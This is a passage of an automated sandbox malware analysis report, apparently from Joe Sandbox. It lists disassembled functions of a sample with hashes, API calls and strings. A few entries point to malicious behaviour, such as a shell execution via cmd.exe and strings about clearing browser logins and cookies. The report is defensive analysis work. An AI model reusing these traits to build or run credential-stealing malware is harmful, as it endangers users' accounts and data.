                                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                                          • String ID: /C $cmd.exe$open
                                                                                                                                                                                          • API String ID: 587946157-3896048727
                                                                                                                                                                                          • Opcode ID: 206ab2a9beee32d390eb707afaf7d197c29ae14873606f3aa179365fcf4419c9
                                                                                                                                                                                          • Instruction ID: c7620f620659ef6545e8cbceca87aebec93a5660276e447bfee3a7025055d8bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 206ab2a9beee32d390eb707afaf7d197c29ae14873606f3aa179365fcf4419c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E030765083446ECA96D764CC90CBF73ADAA54702B400D1CB182D2090EF24AA09CB10
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403155 Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"bogus context in Local_unwind()"$XX.CPP$XX.CPP$bogus context in Local_unwind()$xdrPtr && xdrPtr == *xdrLPP
                                                                                                                                                                                          • API String ID: 0-2274747209
                                                                                                                                                                                          • Opcode ID: dffa354142600f96ffae5fe3d2cd138efea7f7a1046f33163713e7410180cacb
                                                                                                                                                                                          • Instruction ID: 516aefb7a012da5173fd0e028fe258a323a667e0b87e22488f643828e0ac6d51
                                                                                                                                                                                          • Opcode Fuzzy Hash: dffa354142600f96ffae5fe3d2cd138efea7f7a1046f33163713e7410180cacb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0341B331A00204ABCB10CF95C88196EBBB5FF88311B2485BEE8057B3D5D739AF41CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D9F72 Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: ec4142ae80350b4b9c069a6394b0971aab0548a2c4ce586fc51d3acaf8058750
                                                                                                                                                                                          • Instruction ID: 3ddc87e28a35077c3c87ccb1237fa6271443e838cdfd0a8e0945515301df3026
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec4142ae80350b4b9c069a6394b0971aab0548a2c4ce586fc51d3acaf8058750
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC14575904206ABDB34EF7D9D49AAB7FA8FF85310F1444ABE48497381E7318E41CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402DB4 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XX.CPP$XX.CPP$XX.CPP$__CPPexceptionList$xdrPtr->xdERRaddr == xl
                                                                                                                                                                                          • API String ID: 0-2716089706
                                                                                                                                                                                          • Opcode ID: 3613f1da5c4df233601c34342cc4047bbf08cb7ddbce1de1525740bd2869398b
                                                                                                                                                                                          • Instruction ID: 205238748063476e7240139f92a0f40b6e412298044ebf34a4ef91ed06f1cea7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3613f1da5c4df233601c34342cc4047bbf08cb7ddbce1de1525740bd2869398b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E216D74D40204ABCB00DF95C886BAEB3B4BF58714F1441BAE8443B3D2D778AE408A99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005DADE6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                          • Opcode ID: 94711b856b3c5e2de80f6088aa64ab24f970b25138e9d1cb8ebc1df5ba721bbe
                                                                                                                                                                                          • Instruction ID: 9b829efd60af5f287b3ca04a903b9376cbb834a8c79bbac30a22192df3baae1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94711b856b3c5e2de80f6088aa64ab24f970b25138e9d1cb8ebc1df5ba721bbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4A12F769002869FEB358F1CC891BABBFA6FF51300F1945ABE4958B382D7388941C752
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1237A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                          • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                                          • Instruction ID: 7c8463cade10796610cdeb8d07b89d5494b4303a7ac5869d4cc0144bffc7b7a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA16877A143869FEB11CF98C8807EEBBE5EF25314F2442ADD9949B281C23D9943C750
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004028BE Relevance: 6.3, Strings: 5, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"what?"$(mfnMask & 0x0080) == 0$XX.CPP$XX.CPP$what?
                                                                                                                                                                                          • API String ID: 0-3848249686
                                                                                                                                                                                          • Opcode ID: 5edef0c466f2d7c8f1e4992642c7e8d12e3f46bd7ad321fb427a786fd913252a
                                                                                                                                                                                          • Instruction ID: 6f30e4bb0dc5be0823d8bc3532c4122e76f8a62a5c106d7b0af8ad83967fcba9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5edef0c466f2d7c8f1e4992642c7e8d12e3f46bd7ad321fb427a786fd913252a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7401A2B664420C7BEF001E95ED8D6AAB755FB80324F58C233F91D345E0C7BB4A10A549
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407B28 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: +$-$-$0$9
                                                                                                                                                                                          • API String ID: 0-893461730
                                                                                                                                                                                          • Opcode ID: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
                                                                                                                                                                                          • Instruction ID: f31289fd9d699b06c41f7a0dd522d8b38f8464f47830024adc65ef0280f1a9f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0D112F9A0151AEB24012ACC517A2B7AA9B923A9F1C45739881E22D1D43CF902C29A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005DDB62 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5e09cade9917dec00e19583623e60a1e65d504fed14bbdcf8aab25c6bdc53798
                                                                                                                                                                                          • Instruction ID: 0000b85436bfaf1df0769b99dcdefe8ef5e649104f18ba172d4ac3ac12763860
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e09cade9917dec00e19583623e60a1e65d504fed14bbdcf8aab25c6bdc53798
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41C1DC74A0424AABDB21DFACC844BADBFB5FF59300F18459BE814AB392C7709941CB75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406964 Relevance: 6.2, APIs: 4, Instructions: 169fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,?), ref: 00406A20
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,00000005,00000000,00000000,?,?,?,?), ref: 00406AD8
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000005,00000000,00000000,?,?,?,?), ref: 00406AE4
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00406B51
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCloseCreateErrorHandleLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2927643983-0
                                                                                                                                                                                          • Opcode ID: 6e1a6058ef37750cda5ec70bfb999172adfa67f6a0ca6a7b2993c58ec04b35ae
                                                                                                                                                                                          • Instruction ID: 6f5b4d9775ee43f79354ff038f0f17c990ff5a4ab966ecf6b1d5bf88aed51e66
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e1a6058ef37750cda5ec70bfb999172adfa67f6a0ca6a7b2993c58ec04b35ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB5126B16002059AE714AF69C9457BE3BA49B42324F27C13BE917BB3C1C63C8A61CB1D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401000 Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,0040D0D4), ref: 00401035
                                                                                                                                                                                          • GetEnvironmentStrings.KERNEL32 ref: 0040B514
                                                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 0040B51E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CommandEnvironmentHandleLineModuleStrings
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1584138308-0
                                                                                                                                                                                          • Opcode ID: 94c200fce6d2c3bf77e37ea998ce0968a4fe829889128b05807b9de8d1964050
                                                                                                                                                                                          • Instruction ID: 1e125b975a801eda77775a79630f441c36246d9b4f70de590b5ee850b0935413
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94c200fce6d2c3bf77e37ea998ce0968a4fe829889128b05807b9de8d1964050
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8413670904304ABDB209F69DC86B6637A5EB4530CF2441BBE645BB3D2DB789842C7DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004075A4 Relevance: 6.2, APIs: 4, Instructions: 158COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b24085fe64824f974de4ea01719d329f8b1e97d99326a1ffc5e79c6b344e013f
                                                                                                                                                                                          • Instruction ID: a7873f668418494e431f87f18466fb187a4c17b9fd22a2fdba2d4eb1950bd8a6
                                                                                                                                                                                          • Opcode Fuzzy Hash: b24085fe64824f974de4ea01719d329f8b1e97d99326a1ffc5e79c6b344e013f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E517730E08609EFDB10CF58C894BAA7365FB41364F208A76F5226B2D1C779BD45CB5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146486E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,14646FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 14648731
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 146487BA
                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 146487CC
                                                                                                                                                                                          • __freea.LIBCMT ref: 146487D5
                                                                                                                                                                                            • Part of subcall function 146456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 14645702
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                          • Opcode ID: 1472ed4def2920cce8c7637f7ba7aa8775169396b25fb33adebaf03358670ff6
                                                                                                                                                                                          • Instruction ID: 55c2fa8e1f0e5860410eeabed5289f76304ebe81a830207265c7bc93d61a2b34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1472ed4def2920cce8c7637f7ba7aa8775169396b25fb33adebaf03358670ff6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31F23AA0021AABEF25CF65CC90DAF3BA5EF50718F290128ED04DB190E735DC51CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • [Cleared browsers logins and cookies.], xrefs: 1233C0E4
                                                                                                                                                                                          • Cleared browsers logins and cookies., xrefs: 1233C0F5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                          • API String ID: 3472027048-1236744412
                                                                                                                                                                                          • Opcode ID: 3339c54cb2742ef6f38a5628c07f96f703b33f55c3bb80d9a65a4ea752d31b71
                                                                                                                                                                                          • Instruction ID: dd522b454faeab48ab04d3d72fe515aa87fc51498d61e7b25bf8344228ba695a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3339c54cb2742ef6f38a5628c07f96f703b33f55c3bb80d9a65a4ea752d31b71
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731F30F65C3C16EEA175BB658647FA7F870F9324AF044A5CE8D90B282D922860CD763
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 188215759-0
                                                                                                                                                                                          • Opcode ID: 5f2d50cadebb7d3f8cf2b1a8444b73d0a6ac3a689de10bbee6356efe85897404
                                                                                                                                                                                          • Instruction ID: 0154d8ab8691076f6e868a898975a682829d5edc776077cc23a9e1730a51eff0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f2d50cadebb7d3f8cf2b1a8444b73d0a6ac3a689de10bbee6356efe85897404
                                                                                                                                                                                          • Instruction Fuzzy Hash: B811427B508389ABD359EAB4CCC4DBF77EDEBD8750F140A39F55682040FE64E6088661
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14645CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,14641D66,00000000,00000000,?,14645C88,14641D66,00000000,00000000,00000000,?,14645E85,00000006,FlsSetValue), ref: 14645D13
                                                                                                                                                                                          • GetLastError.KERNEL32(?,14645C88,14641D66,00000000,00000000,00000000,?,14645E85,00000006,FlsSetValue,1464E190,FlsSetValue,00000000,00000364,?,14645BC8), ref: 14645D1F
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,14645C88,14641D66,00000000,00000000,00000000,?,14645E85,00000006,FlsSetValue,1464E190,FlsSetValue,00000000), ref: 14645D2D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                          • Opcode ID: cf864c44325957709022161106441fdc1f59da1c55ef9d8dd52134060d5190b4
                                                                                                                                                                                          • Instruction ID: 8c8e6b85c16866518abf979c69b5dc586d539c906f422b12f41503fea9741683
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf864c44325957709022161106441fdc1f59da1c55ef9d8dd52134060d5190b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001AC367112366BCF315E689C8CA46775CEF25AA9B290625FB05D7A40D730D402CAD4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005CA645 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 005CA65C
                                                                                                                                                                                            • Part of subcall function 005CAC94: ___AdjustPointer.LIBCMT ref: 005CACDE
                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 005CA673
                                                                                                                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 005CA685
                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 005CA6A9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2633735394-0
                                                                                                                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                          • Instruction ID: 9844b835f91a17ccfa4ff27d99298901a54ff87d7eb6abe2b53e45a6381fc8ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801B332400109AFCF125EA5CD05FDA3FAAFB88758F194019F91866120D376A8A1EBA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123493E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004C), ref: 123493F0
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004D), ref: 123493F6
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004E), ref: 123493FC
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004F), ref: 12349402
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
